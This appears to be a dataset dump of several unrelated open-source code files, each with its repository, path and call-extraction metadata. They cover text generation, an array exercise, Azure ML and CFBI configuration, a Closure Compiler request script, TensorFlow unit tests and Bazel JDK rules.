            gen_idx = seed_len + ii,
            top_k = topk,
            temperature = temperature,
            sample = (ii < burnin),
        )
        for jj in range(batch_size):
            batch[jj][seed_len + ii] = idxs[jj]

    results = untokenize_batch(batch.tolist(), model._tokenizer)

    if hasattr(model._tokenizer, 'sp_model'):
        merge_function = merge_sentencepiece_tokens
    else:
        merge_function = merge_wordpiece_tokens

    outputs = []
    for r in results:
        r = [(t, 0) for t in r]
        r = merge_function(r)
        r = [t[0] for t in r]
        outputs.append(' '.join(r))
    return outputs
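A usage sketch for the module above (not part of the original file). The `model` here is assumed to be any Malaya transformer wrapper exposing the `_tokenizer`, `_sess`, `_logits`, `X`, `MASK` and `segment_ids` attributes that `sequential_generation` reads; `load_transformer` is a hypothetical stand-in for whatever loader produces such an object.

model = load_transformer('bert')  # hypothetical loader, see note above

candidates = sequential_generation(
    'saya suka makan nasi goreng',  # illustrative Malay seed text
    model,
    batch_size = 3,   # number of parallel samples to generate
    max_len = 20,     # number of masked positions filled in after the seed
    top_k = 100,      # sample only from the top-k logits after burn-in
    burnin = 10,      # pure sampling steps before top-k filtering starts
)
for sentence in candidates:
    print(sentence)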
[((19, 17, 19, 45), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', ({(19, 38, 19, 44): 'logits'}, {}), '(logits)', True, 'import tensorflow as tf\n'), ((20, 28, 20, 58), 'tensorflow.nn.top_k', 'tf.nn.top_k', (), '', True, 'import tensorflow as tf\n'), ((21, 15, 21, 75), 'tensorflow_probability.distributions.categorical.Categorical', 'tfp.distributions.categorical.Categorical', (), '', True, 'import tensorflow_probability as tfp\n'), ((25, 14, 25, 40), 'tensorflow.squeeze', 'tf.squeeze', (), '', True, 'import tensorflow as tf\n'), ((31, 17, 31, 45), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', ({(31, 38, 31, 44): 'logits'}, {}), '(logits)', True, 'import tensorflow as tf\n'), ((32, 15, 32, 73), 'tensorflow_probability.distributions.categorical.Categorical', 'tfp.distributions.categorical.Categorical', (), '', True, 'import tensorflow_probability as tfp\n'), ((88, 16, 88, 31), 'numpy.array', 'np.array', ({(88, 25, 88, 30): 'batch'}, {}), '(batch)', True, 'import numpy as np\n'), ((89, 16, 89, 36), 'numpy.ones', 'np.ones', ({(89, 24, 89, 35): 'batch.shape'}, {}), '(batch.shape)', True, 'import numpy as np\n'), ((90, 19, 90, 40), 'numpy.zeros', 'np.zeros', ({(90, 28, 90, 39): 'batch.shape'}, {}), '(batch.shape)', True, 'import numpy as np\n'), ((51, 14, 51, 42), 'numpy.argmax', 'np.argmax', (), '', True, 'import numpy as np\n'), ((18, 9, 18, 32), 'tensorflow.InteractiveSession', 'tf.InteractiveSession', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((30, 9, 30, 32), 'tensorflow.InteractiveSession', 'tf.InteractiveSession', ({}, {}), '()', True, 'import tensorflow as tf\n')]
mkoryor/Python
coding patterns/two pointers/sortedarr_square.py
837ec4c03130dc4cb919fb5f1eeb4d31206790e4
""" [E] Given a sorted array, create a new array containing squares of all the number of the input array in the sorted order. Input: [-2, -1, 0, 2, 3] Output: [0, 1, 4, 4, 9] """ # Time: O(N) Space: O(n) def make_squares(arr): n = len(arr) squares = [0 for x in range(n)] highestSquareIdx = n - 1 left, right = 0, n - 1 while left <= right: leftSquare = arr[left] * arr[left] rightSquare = arr[right] * arr[right] if leftSquare > rightSquare: squares[highestSquareIdx] = leftSquare left += 1 else: squares[highestSquareIdx] = rightSquare right -= 1 highestSquareIdx -= 1 return squares
[]
Azure/aml-object-classification-pipeline
modules/evaluate/evaluate_step.py
f94e4327ebfb5534b52c5c70e82832a86c64a2d1
import os
from azureml.pipeline.steps import PythonScriptStep
from azureml.core.runconfig import RunConfiguration
from azureml.core.conda_dependencies import CondaDependencies
from azureml.pipeline.core import PipelineData
from azureml.pipeline.core import PipelineParameter
from azureml.pipeline.steps import EstimatorStep
from azureml.train.dnn import PyTorch


def evaluate_step(model_dir, test_dir, compute_target):
    '''
    This step evaluates the trained model on the testing data and outputs the accuracy.

    :param model_dir: The reference to the directory containing the trained model
    :type model_dir: DataReference
    :param test_dir: The reference to the directory containing the testing data
    :type test_dir: DataReference
    :param compute_target: The compute target to run the step on
    :type compute_target: ComputeTarget

    :return: The evaluate step, step outputs dictionary (keys: accuracy_file)
    :rtype: EstimatorStep, dict
    '''

    accuracy_file = PipelineData(
        name='accuracy_file',
        pipeline_output_name='accuracy_file',
        datastore=test_dir.datastore,
        output_mode='mount',
        is_directory=False)

    outputs = [accuracy_file]
    outputs_map = {'accuracy_file': accuracy_file}

    estimator = PyTorch(
        source_directory=os.path.dirname(os.path.abspath(__file__)),
        entry_script='evaluate.py',
        framework_version='1.3',
        compute_target=compute_target,
        use_gpu=True)

    step = EstimatorStep(
        name="Evaluate Model",
        estimator=estimator,
        estimator_entry_script_arguments=[
            '--test_dir', test_dir,
            '--model_dir', model_dir,
            '--accuracy_file', accuracy_file
        ],
        inputs=[model_dir, test_dir],
        outputs=outputs,
        compute_target=compute_target,
        allow_reuse=True)

    return step, outputs_map
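A hedged sketch of how this step might be wired into a pipeline (not part of the original file). The workspace config, datastore paths, compute target name, and experiment name below are placeholders, not values from this repository; the calls themselves are standard Azure ML SDK v1 APIs.

from azureml.core import Workspace, Experiment
from azureml.data.data_reference import DataReference
from azureml.pipeline.core import Pipeline

ws = Workspace.from_config()                       # assumes a local config.json
compute_target = ws.compute_targets['gpu-cluster']   # placeholder cluster name
datastore = ws.get_default_datastore()

# Placeholder datastore paths for the trained model and the test split
model_dir = DataReference(datastore=datastore,
                          data_reference_name='model_dir',
                          path_on_datastore='models/latest')
test_dir = DataReference(datastore=datastore,
                         data_reference_name='test_dir',
                         path_on_datastore='data/test')

step, outputs_map = evaluate_step(model_dir, test_dir, compute_target)
pipeline = Pipeline(workspace=ws, steps=[step])
run = Experiment(ws, 'evaluate-model').submit(pipeline)
run.wait_for_completion(show_output=True)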
[((25, 20, 30, 27), 'azureml.pipeline.core.PipelineData', 'PipelineData', (), '', False, 'from azureml.pipeline.core import PipelineData\n'), ((42, 11, 53, 25), 'azureml.pipeline.steps.EstimatorStep', 'EstimatorStep', (), '', False, 'from azureml.pipeline.steps import EstimatorStep\n'), ((36, 41, 36, 66), 'os.path.abspath', 'os.path.abspath', ({(36, 57, 36, 65): '__file__'}, {}), '(__file__)', False, 'import os\n')]
yoxu515/CFBI
configs/mobilenet_cfbi.py
0bab1e3c9fc3e3ba0629f716d60221e8f8d9d586
import torch import argparse import os import sys import cv2 import time class Configuration(): def __init__(self): self.EXP_NAME = 'mobilenetv2_cfbi' self.DIR_ROOT = './' self.DIR_DATA = os.path.join(self.DIR_ROOT, 'datasets') self.DIR_DAVIS = os.path.join(self.DIR_DATA, 'DAVIS') self.DIR_YTB = os.path.join(self.DIR_DATA, 'YTB/train') self.DIR_YTB_EVAL = os.path.join(self.DIR_DATA, 'YTB/valid') self.DIR_RESULT = os.path.join(self.DIR_ROOT, 'result', self.EXP_NAME) self.DIR_CKPT = os.path.join(self.DIR_RESULT, 'ckpt') self.DIR_LOG = os.path.join(self.DIR_RESULT, 'log') self.DIR_IMG_LOG = os.path.join(self.DIR_RESULT, 'log', 'img') self.DIR_TB_LOG = os.path.join(self.DIR_RESULT, 'log', 'tensorboard') self.DIR_EVALUATION = os.path.join(self.DIR_RESULT, 'eval') self.DATASETS = ['youtubevos'] self.DATA_WORKERS = 4 self.DATA_RANDOMCROP = (465, 465) self.DATA_RANDOMFLIP = 0.5 self.DATA_MAX_CROP_STEPS = 5 self.DATA_MIN_SCALE_FACTOR = 1. self.DATA_MAX_SCALE_FACTOR = 1.3 self.DATA_SHORT_EDGE_LEN = 480 self.DATA_RANDOM_REVERSE_SEQ = True self.DATA_DAVIS_REPEAT = 30 self.DATA_CURR_SEQ_LEN = 3 self.DATA_RANDOM_GAP_DAVIS = 3 self.DATA_RANDOM_GAP_YTB = 3 self.PRETRAIN = True self.PRETRAIN_FULL = False self.PRETRAIN_MODEL = './pretrain_models/mobilenetv2-deeplabv3p.pth.tar' self.MODEL_BACKBONE = 'mobilenet' self.MODEL_MODULE = 'networks.cfbi.cfbi' self.MODEL_OUTPUT_STRIDE = 16 self.MODEL_ASPP_OUTDIM = 256 self.MODEL_SHORTCUT_DIM = 48 self.MODEL_SEMANTIC_EMBEDDING_DIM = 100 self.MODEL_HEAD_EMBEDDING_DIM = 256 self.MODEL_PRE_HEAD_EMBEDDING_DIM = 64 self.MODEL_GN_GROUPS = 32 self.MODEL_GN_EMB_GROUPS = 25 self.MODEL_MULTI_LOCAL_DISTANCE = [2, 4, 6, 8, 10, 12] self.MODEL_LOCAL_DOWNSAMPLE = True self.MODEL_REFINE_CHANNELS = 64 # n * 32 self.MODEL_LOW_LEVEL_INPLANES = 256 if self.MODEL_BACKBONE == 'resnet' else 24 self.MODEL_RELATED_CHANNELS = 64 self.MODEL_EPSILON = 1e-5 self.MODEL_MATCHING_BACKGROUND = True self.MODEL_GCT_BETA_WD = True self.MODEL_FLOAT16_MATCHING = True self.MODEL_FREEZE_BN = True self.MODEL_FREEZE_BACKBONE = False self.TRAIN_TOTAL_STEPS = 100000 self.TRAIN_START_STEP = 0 self.TRAIN_LR = 0.01 self.TRAIN_MOMENTUM = 0.9 self.TRAIN_COSINE_DECAY = False self.TRAIN_WARM_UP_STEPS = 1000 self.TRAIN_WEIGHT_DECAY = 15e-5 self.TRAIN_POWER = 0.9 self.TRAIN_GPUS = 4 self.TRAIN_BATCH_SIZE = 8 self.TRAIN_START_SEQ_TRAINING_STEPS = self.TRAIN_TOTAL_STEPS / 2 self.TRAIN_TBLOG = False self.TRAIN_TBLOG_STEP = 60 self.TRAIN_LOG_STEP = 20 self.TRAIN_IMG_LOG = False self.TRAIN_TOP_K_PERCENT_PIXELS = 0.15 self.TRAIN_HARD_MINING_STEP = self.TRAIN_TOTAL_STEPS / 2 self.TRAIN_CLIP_GRAD_NORM = 5. self.TRAIN_SAVE_STEP = 1000 self.TRAIN_MAX_KEEP_CKPT = 8 self.TRAIN_RESUME = False self.TRAIN_RESUME_CKPT = None self.TRAIN_RESUME_STEP = 0 self.TRAIN_AUTO_RESUME = True self.TRAIN_GLOBAL_ATROUS_RATE = 1 self.TRAIN_LOCAL_ATROUS_RATE = 1 self.TRAIN_GLOBAL_CHUNKS = 20 self.TRAIN_DATASET_FULL_RESOLUTION = True self.TEST_GPU_ID = 0 self.TEST_DATASET = 'youtubevos' self.TEST_DATASET_FULL_RESOLUTION = False self.TEST_DATASET_SPLIT = ['val'] self.TEST_CKPT_PATH = None self.TEST_CKPT_STEP = None # if "None", evaluate the latest checkpoint. 
self.TEST_FLIP = False self.TEST_MULTISCALE = [1] self.TEST_MIN_SIZE = None self.TEST_MAX_SIZE = 800 * 1.3 if self.TEST_MULTISCALE == [1] else 800 self.TEST_WORKERS = 4 self.TEST_GLOBAL_CHUNKS = 4 self.TEST_GLOBAL_ATROUS_RATE = 2 self.TEST_LOCAL_ATROUS_RATE = 1 # dist self.DIST_ENABLE = True self.DIST_BACKEND = "gloo" self.DIST_URL = "file://./sharefile" self.DIST_START_GPU = 0 self.__check() def __check(self): if not torch.cuda.is_available(): raise ValueError('config.py: cuda is not avalable') if self.TRAIN_GPUS == 0: raise ValueError('config.py: the number of GPU is 0') for path in [self.DIR_RESULT, self.DIR_CKPT, self.DIR_LOG, self.DIR_EVALUATION, self.DIR_IMG_LOG, self.DIR_TB_LOG]: if not os.path.isdir(path): os.makedirs(path) cfg = Configuration()
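A small illustration of how the `cfg` object defined above is typically consumed (not part of the original file). Importing the module runs `__check`, so it requires a CUDA-capable machine and creates the result directories as a side effect; the import path assumes the repository root is on `PYTHONPATH`.

from configs.mobilenet_cfbi import cfg

# Override a few fields before launching training (illustrative values)
cfg.TRAIN_GPUS = 2
cfg.TRAIN_BATCH_SIZE = 4

print(cfg.EXP_NAME)   # mobilenetv2_cfbi
print(cfg.DIR_CKPT)   # ./result/mobilenetv2_cfbi/ckpt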
[((14, 24, 14, 63), 'os.path.join', 'os.path.join', ({(14, 37, 14, 50): 'self.DIR_ROOT', (14, 52, 14, 62): '"""datasets"""'}, {}), "(self.DIR_ROOT, 'datasets')", False, 'import os\n'), ((15, 26, 15, 62), 'os.path.join', 'os.path.join', ({(15, 39, 15, 52): 'self.DIR_DATA', (15, 54, 15, 61): '"""DAVIS"""'}, {}), "(self.DIR_DATA, 'DAVIS')", False, 'import os\n'), ((16, 24, 16, 64), 'os.path.join', 'os.path.join', ({(16, 37, 16, 50): 'self.DIR_DATA', (16, 52, 16, 63): '"""YTB/train"""'}, {}), "(self.DIR_DATA, 'YTB/train')", False, 'import os\n'), ((17, 29, 17, 69), 'os.path.join', 'os.path.join', ({(17, 42, 17, 55): 'self.DIR_DATA', (17, 57, 17, 68): '"""YTB/valid"""'}, {}), "(self.DIR_DATA, 'YTB/valid')", False, 'import os\n'), ((18, 26, 18, 78), 'os.path.join', 'os.path.join', ({(18, 39, 18, 52): 'self.DIR_ROOT', (18, 54, 18, 62): '"""result"""', (18, 64, 18, 77): 'self.EXP_NAME'}, {}), "(self.DIR_ROOT, 'result', self.EXP_NAME)", False, 'import os\n'), ((19, 24, 19, 61), 'os.path.join', 'os.path.join', ({(19, 37, 19, 52): 'self.DIR_RESULT', (19, 54, 19, 60): '"""ckpt"""'}, {}), "(self.DIR_RESULT, 'ckpt')", False, 'import os\n'), ((20, 23, 20, 59), 'os.path.join', 'os.path.join', ({(20, 36, 20, 51): 'self.DIR_RESULT', (20, 53, 20, 58): '"""log"""'}, {}), "(self.DIR_RESULT, 'log')", False, 'import os\n'), ((21, 27, 21, 70), 'os.path.join', 'os.path.join', ({(21, 40, 21, 55): 'self.DIR_RESULT', (21, 57, 21, 62): '"""log"""', (21, 64, 21, 69): '"""img"""'}, {}), "(self.DIR_RESULT, 'log', 'img')", False, 'import os\n'), ((22, 26, 22, 77), 'os.path.join', 'os.path.join', ({(22, 39, 22, 54): 'self.DIR_RESULT', (22, 56, 22, 61): '"""log"""', (22, 63, 22, 76): '"""tensorboard"""'}, {}), "(self.DIR_RESULT, 'log', 'tensorboard')", False, 'import os\n'), ((23, 30, 23, 67), 'os.path.join', 'os.path.join', ({(23, 43, 23, 58): 'self.DIR_RESULT', (23, 60, 23, 66): '"""eval"""'}, {}), "(self.DIR_RESULT, 'eval')", False, 'import os\n'), ((120, 15, 120, 40), 'torch.cuda.is_available', 'torch.cuda.is_available', ({}, {}), '()', False, 'import torch\n'), ((125, 19, 125, 38), 'os.path.isdir', 'os.path.isdir', ({(125, 33, 125, 37): 'path'}, {}), '(path)', False, 'import os\n'), ((126, 16, 126, 33), 'os.makedirs', 'os.makedirs', ({(126, 28, 126, 32): 'path'}, {}), '(path)', False, 'import os\n')]
kennytilton/ConnectJS
js/matrixjs/matrix_compile.py
a16121052839b6f447718dccb008761d92094885
#!/usr/bin/python2.4

import httplib, urllib, sys

# Define the parameters for the POST request and encode them in
# a URL-safe format.

params = urllib.urlencode([
    #('js_code', sys.argv[1]),
    ('code_url', 'https://raw.githubusercontent.com/kennytilton/MatrixJS/master/js/matrixjs/js/Matrix/Cells.js'),
    ('code_url', 'https://raw.githubusercontent.com/kennytilton/MatrixJS/master/js/matrixjs/js/Matrix/Model.js'),
    ('code_url', 'https://raw.githubusercontent.com/kennytilton/MatrixJS/master/js/matrixjs/js/Tag.js'),
    ('compilation_level', 'ADVANCED_OPTIMIZATIONS'),
    ('output_format', 'text'),
    ('output_info', 'warnings'),
])

# Always use the following value for the Content-type header.
headers = { "Content-type": "application/x-www-form-urlencoded" }
conn = httplib.HTTPConnection('closure-compiler.appspot.com')
conn.request('POST', '/compile', params, headers)
response = conn.getresponse()
data = response.read()
print data
conn.close()
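The script above is Python 2 (`httplib`, `urllib.urlencode`, the `print` statement). For reference, a hedged Python 3 equivalent of the same request; using HTTPS for the Closure Compiler service is an assumption, not something verified here.

#!/usr/bin/env python3
import http.client
import urllib.parse

params = urllib.parse.urlencode([
    ('code_url', 'https://raw.githubusercontent.com/kennytilton/MatrixJS/master/js/matrixjs/js/Matrix/Cells.js'),
    ('code_url', 'https://raw.githubusercontent.com/kennytilton/MatrixJS/master/js/matrixjs/js/Matrix/Model.js'),
    ('code_url', 'https://raw.githubusercontent.com/kennytilton/MatrixJS/master/js/matrixjs/js/Tag.js'),
    ('compilation_level', 'ADVANCED_OPTIMIZATIONS'),
    ('output_format', 'text'),
    ('output_info', 'warnings'),
])
headers = {'Content-type': 'application/x-www-form-urlencoded'}

conn = http.client.HTTPSConnection('closure-compiler.appspot.com')  # HTTPS assumed
conn.request('POST', '/compile', params, headers)
print(conn.getresponse().read().decode('utf-8'))
conn.close()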
[]
npow/tensorflow
tensorflow/python/util/tf_should_use_test.py
99ae68bba52bb6338af06f37bb104128d7af6fb4
# Copyright 2017 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Unit tests for tf_should_use.""" # pylint: disable=unused-import from __future__ import absolute_import from __future__ import division from __future__ import print_function import contextlib import gc import sys from tensorflow.python.framework import constant_op from tensorflow.python.platform import test from tensorflow.python.platform import tf_logging from tensorflow.python.util import tf_should_use @contextlib.contextmanager def reroute_error(): """Temporarily reroute errors written to tf_logging.error into `captured`.""" with test.mock.patch.object(tf_should_use.tf_logging, 'error') as error: with test.mock.patch.object(tf_should_use.tf_logging, 'fatal') as fatal: yield error, fatal class TfShouldUseTest(test.TestCase): def testAddShouldUseWarningWhenNotUsed(self): c = constant_op.constant(0, name='blah0') def in_this_function(): h = tf_should_use._add_should_use_warning(c) del h with reroute_error() as (error, _): in_this_function() error.assert_called() msg = '\n'.join(error.call_args[0]) self.assertIn('Object was never used', msg) self.assertIn('blah0:0', msg) self.assertIn('in_this_function', msg) self.assertFalse(gc.garbage) def testAddShouldUseFatalWhenNotUsed(self): c = constant_op.constant(0, name='blah0') def in_this_function(): h = tf_should_use._add_should_use_warning(c, fatal_error=True) del h with reroute_error() as (_, fatal): in_this_function() fatal.assert_called() msg = '\n'.join(fatal.call_args[0]) self.assertIn('Object was never used', msg) self.assertIn('blah0:0', msg) self.assertIn('in_this_function', msg) self.assertFalse(gc.garbage) def _testAddShouldUseWarningWhenUsed(self, fn, name): c = constant_op.constant(0, name=name) with reroute_error() as (error, fatal): h = tf_should_use._add_should_use_warning(c) fn(h) del h error.assert_not_called() fatal.assert_not_called() def testAddShouldUseWarningWhenUsedWithAdd(self): def add(h): _ = h + 1 self._testAddShouldUseWarningWhenUsed(add, name='blah_add') gc.collect() self.assertFalse(gc.garbage) def testAddShouldUseWarningWhenUsedWithGetName(self): def get_name(h): _ = h.name self._testAddShouldUseWarningWhenUsed(get_name, name='blah_get_name') gc.collect() self.assertFalse(gc.garbage) def testShouldUseResult(self): @tf_should_use.should_use_result def return_const(value): return constant_op.constant(value, name='blah2') with reroute_error() as (error, _): return_const(0.0) error.assert_called() msg = '\n'.join(error.call_args[0]) self.assertIn('Object was never used', msg) self.assertIn('blah2:0', msg) self.assertIn('return_const', msg) gc.collect() self.assertFalse(gc.garbage) def testShouldUseResultWhenNotReallyUsed(self): @tf_should_use.should_use_result def return_const(value): return constant_op.constant(value, name='blah3') with reroute_error() as (error, _): with self.test_session(): return_const(0.0) # Creating another op and 
executing it does not mark the # unused op as being "used". v = constant_op.constant(1.0, name='meh') v.eval() error.assert_called() msg = '\n'.join(error.call_args[0]) self.assertIn('Object was never used', msg) self.assertIn('blah3:0', msg) self.assertIn('return_const', msg) gc.collect() self.assertFalse(gc.garbage) # Tests that mark_used is available in the API. def testMarkUsed(self): @tf_should_use.should_use_result def return_const(value): return constant_op.constant(value, name='blah3') with self.test_session(): return_const(0.0).mark_used() if __name__ == '__main__': test.main()
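A compact sketch of the pattern these tests exercise, mirroring `testMarkUsed` above (not part of the original file): decorate a function with `should_use_result`, then call `mark_used()` on the returned value to acknowledge it.

from tensorflow.python.framework import constant_op
from tensorflow.python.util import tf_should_use


@tf_should_use.should_use_result
def make_const(value):
  return constant_op.constant(value, name='example_const')


c = make_const(1.0)
c.mark_used()  # explicitly acknowledge the result so no warning is logged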
[((135, 2, 135, 13), 'tensorflow.python.platform.test.main', 'test.main', ({}, {}), '()', False, 'from tensorflow.python.platform import test\n'), ((35, 7, 35, 64), 'tensorflow.python.platform.test.mock.patch.object', 'test.mock.patch.object', ({(35, 30, 35, 54): 'tf_should_use.tf_logging', (35, 56, 35, 63): '"""error"""'}, {}), "(tf_should_use.tf_logging, 'error')", False, 'from tensorflow.python.platform import test\n'), ((43, 8, 43, 45), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (), '', False, 'from tensorflow.python.framework import constant_op\n'), ((57, 8, 57, 45), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (), '', False, 'from tensorflow.python.framework import constant_op\n'), ((71, 8, 71, 42), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (), '', False, 'from tensorflow.python.framework import constant_op\n'), ((83, 4, 83, 16), 'gc.collect', 'gc.collect', ({}, {}), '()', False, 'import gc\n'), ((90, 4, 90, 16), 'gc.collect', 'gc.collect', ({}, {}), '()', False, 'import gc\n'), ((104, 4, 104, 16), 'gc.collect', 'gc.collect', ({}, {}), '()', False, 'import gc\n'), ((123, 4, 123, 16), 'gc.collect', 'gc.collect', ({}, {}), '()', False, 'import gc\n'), ((36, 9, 36, 66), 'tensorflow.python.platform.test.mock.patch.object', 'test.mock.patch.object', ({(36, 32, 36, 56): 'tf_should_use.tf_logging', (36, 58, 36, 65): '"""fatal"""'}, {}), "(tf_should_use.tf_logging, 'fatal')", False, 'from tensorflow.python.platform import test\n'), ((45, 10, 45, 50), 'tensorflow.python.util.tf_should_use._add_should_use_warning', 'tf_should_use._add_should_use_warning', ({(45, 48, 45, 49): 'c'}, {}), '(c)', False, 'from tensorflow.python.util import tf_should_use\n'), ((59, 10, 59, 68), 'tensorflow.python.util.tf_should_use._add_should_use_warning', 'tf_should_use._add_should_use_warning', (), '', False, 'from tensorflow.python.util import tf_should_use\n'), ((73, 10, 73, 50), 'tensorflow.python.util.tf_should_use._add_should_use_warning', 'tf_should_use._add_should_use_warning', ({(73, 48, 73, 49): 'c'}, {}), '(c)', False, 'from tensorflow.python.util import tf_should_use\n'), ((96, 13, 96, 54), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (), '', False, 'from tensorflow.python.framework import constant_op\n'), ((110, 13, 110, 54), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (), '', False, 'from tensorflow.python.framework import constant_op\n'), ((130, 13, 130, 54), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (), '', False, 'from tensorflow.python.framework import constant_op\n'), ((116, 12, 116, 49), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (), '', False, 'from tensorflow.python.framework import constant_op\n')]
loongarch64/bazel
tools/jdk/local_java_repository.bzl
44c30aceec076a0c25f506508704df0b9aeb6578
# Copyright 2020 The Bazel Authors. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Rules for importing and registering a local JDK.""" load(":default_java_toolchain.bzl", "JVM8_TOOLCHAIN_CONFIGURATION", "default_java_toolchain") def _detect_java_version(repository_ctx, java_bin): properties_out = repository_ctx.execute([java_bin, "-XshowSettings:properties"]).stderr # This returns an indented list of properties separated with newlines: # " java.vendor.url.bug = ... \n" # " java.version = 11.0.8\n" # " java.version.date = 2020-11-05\" strip_properties = [property.strip() for property in properties_out.splitlines()] version_property = [property for property in strip_properties if property.startswith("java.version = ")] if len(version_property) != 1: return None version_value = version_property[0][len("java.version = "):] parts = version_value.split(".") major = parts[0] if len(parts) == 1: return major elif major == "1": # handles versions below 1.8 minor = parts[1] return minor return major def local_java_runtime(name, java_home, version, runtime_name = None, visibility = ["//visibility:public"]): """Defines a java_runtime target together with Java runtime and compile toolchain definitions. Java runtime toolchain is constrained by flag --java_runtime_version having value set to either name or version argument. Java compile toolchains are created for --java_language_version flags values between 8 and version (inclusive). Java compile toolchains use the same (local) JDK for compilation. This requires a different configuration for JDK8 than the newer versions. Args: name: name of the target. java_home: Path to the JDK. version: Version of the JDK. runtime_name: name of java_runtime target if it already exists. 
visibility: Visibility that will be applied to the java runtime target """ if runtime_name == None: runtime_name = name native.java_runtime( name = runtime_name, java_home = java_home, visibility = visibility, ) native.config_setting( name = name + "_name_setting", values = {"java_runtime_version": name}, visibility = ["//visibility:private"], ) native.config_setting( name = name + "_version_setting", values = {"java_runtime_version": version}, visibility = ["//visibility:private"], ) native.config_setting( name = name + "_name_version_setting", values = {"java_runtime_version": name + "_" + version}, visibility = ["//visibility:private"], ) native.alias( name = name + "_settings_alias", actual = select({ name + "_name_setting": name + "_name_setting", name + "_version_setting": name + "_version_setting", "//conditions:default": name + "_name_version_setting", }), visibility = ["//visibility:private"], ) native.toolchain( name = "runtime_toolchain_definition", target_settings = [":%s_settings_alias" % name], toolchain_type = "@bazel_tools//tools/jdk:runtime_toolchain_type", toolchain = runtime_name, ) if version == "8": default_java_toolchain( name = name + "_toolchain_java8", configuration = JVM8_TOOLCHAIN_CONFIGURATION, source_version = version, target_version = version, java_runtime = runtime_name, ) elif type(version) == type("") and version.isdigit() and int(version) > 8: for version in range(8, int(version) + 1): default_java_toolchain( name = name + "_toolchain_java" + str(version), source_version = str(version), target_version = str(version), java_runtime = runtime_name, ) # else version is not recognized and no compilation toolchains are predefined def _local_java_repository_impl(repository_ctx): """Repository rule local_java_repository implementation. Args: repository_ctx: repository context """ java_home = repository_ctx.attr.java_home java_home_path = repository_ctx.path(java_home) if not java_home_path.exists: fail('The path indicated by the "java_home" attribute "%s" (absolute: "%s") ' + "does not exist." 
% (java_home, str(java_home_path))) repository_ctx.file( "WORKSPACE", "# DO NOT EDIT: automatically generated WORKSPACE file for local_java_repository\n" + "workspace(name = \"{name}\")\n".format(name = repository_ctx.name), ) extension = ".exe" if repository_ctx.os.name.lower().find("windows") != -1 else "" java_bin = java_home_path.get_child("bin").get_child("java" + extension) if not java_bin.exists: # Java binary does not exist repository_ctx.file( "BUILD.bazel", _NOJDK_BUILD_TPL.format( local_jdk = repository_ctx.name, java_binary = "bin/java" + extension, java_home = java_home, ), False, ) return # Detect version version = repository_ctx.attr.version if repository_ctx.attr.version != "" else _detect_java_version(repository_ctx, java_bin) # Prepare BUILD file using "local_java_runtime" macro build_file = "" if repository_ctx.attr.build_file != None: build_file = repository_ctx.read(repository_ctx.path(repository_ctx.attr.build_file)) runtime_name = '"jdk"' if repository_ctx.attr.build_file else None local_java_runtime_macro = """ local_java_runtime( name = "%s", runtime_name = %s, java_home = "%s", version = "%s", ) """ % (repository_ctx.name, runtime_name, java_home, version) repository_ctx.file( "BUILD.bazel", 'load("@bazel_tools//tools/jdk:local_java_repository.bzl", "local_java_runtime")\n' + build_file + local_java_runtime_macro, ) # Symlink all files for file in repository_ctx.path(java_home).readdir(): repository_ctx.symlink(file, file.basename) # Build file template, when JDK does not exist _NOJDK_BUILD_TPL = '''load("@bazel_tools//tools/jdk:fail_rule.bzl", "fail_rule") fail_rule( name = "jdk", header = "Auto-Configuration Error:", message = ("Cannot find Java binary {java_binary} in {java_home}; either correct your JAVA_HOME, " + "PATH or specify Java from remote repository (e.g. " + "--java_runtime_version=remotejdk_11") ) config_setting( name = "localjdk_setting", values = {{"java_runtime_version": "{local_jdk}"}}, visibility = ["//visibility:private"], ) toolchain( name = "runtime_toolchain_definition", target_settings = [":localjdk_setting"], toolchain_type = "@bazel_tools//tools/jdk:runtime_toolchain_type", toolchain = ":jdk", ) ''' _local_java_repository_rule = repository_rule( implementation = _local_java_repository_impl, local = True, configure = True, attrs = { "java_home": attr.string(), "version": attr.string(), "build_file": attr.label(), }, ) def local_java_repository(name, java_home, version = "", build_file = None): """Registers a runtime toolchain for local JDK and creates an unregistered compile toolchain. Toolchain resolution is constrained with --java_runtime_version flag having value of the "name" or "version" parameter. Java compile toolchains are created for --java_language_version flags values between 8 and version (inclusive). Java compile toolchains use the same (local) JDK for compilation. If there is no JDK "virtual" targets are created, which fail only when actually needed. Args: name: A unique name for this rule. java_home: Location of the JDK imported. build_file: optionally BUILD file template version: optionally java version """ _local_java_repository_rule(name = name, java_home = java_home, version = version, build_file = build_file) native.register_toolchains("@" + name + "//:runtime_toolchain_definition")
[]
SEL-Columbia/commcare-hq
corehq/apps/fixtures/resources/v0_1.py
992ee34a679c37f063f86200e6df5a197d5e3ff6
from couchdbkit import ResourceNotFound
from tastypie import fields as tp_f

from corehq.apps.api.resources import JsonResource
from corehq.apps.api.resources.v0_1 import (
    CustomResourceMeta,
    RequirePermissionAuthentication,
)
from corehq.apps.api.util import get_object_or_not_exist
from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType
from corehq.apps.users.models import Permissions


def convert_fdt(fdi):
    try:
        fdt = FixtureDataType.get(fdi.data_type_id)
        fdi.fixture_type = fdt.tag
        return fdi
    except ResourceNotFound:
        return fdi


class FixtureResource(JsonResource):
    type = "fixture"
    fields = tp_f.DictField(attribute='try_fields_without_attributes',
